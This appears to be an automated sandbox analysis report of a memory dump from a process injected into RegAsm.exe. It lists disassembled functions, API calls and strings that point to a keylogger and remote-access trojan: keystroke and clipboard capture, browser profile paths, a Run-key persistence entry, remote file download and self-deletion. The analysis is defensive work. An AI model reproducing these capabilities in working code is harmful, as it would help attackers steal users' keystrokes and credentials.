                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: a14b1eb8d802363331a753cbf212e5489769790bc52ddd698e1c7ac902353e26
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: a14b1eb8d802363331a753cbf212e5489769790bc52ddd698e1c7ac902353e26
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                  • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: XMG
                                                  • API String ID: 2315374483-813777761
                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 1881088180-2015055088
                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                  Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                  Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
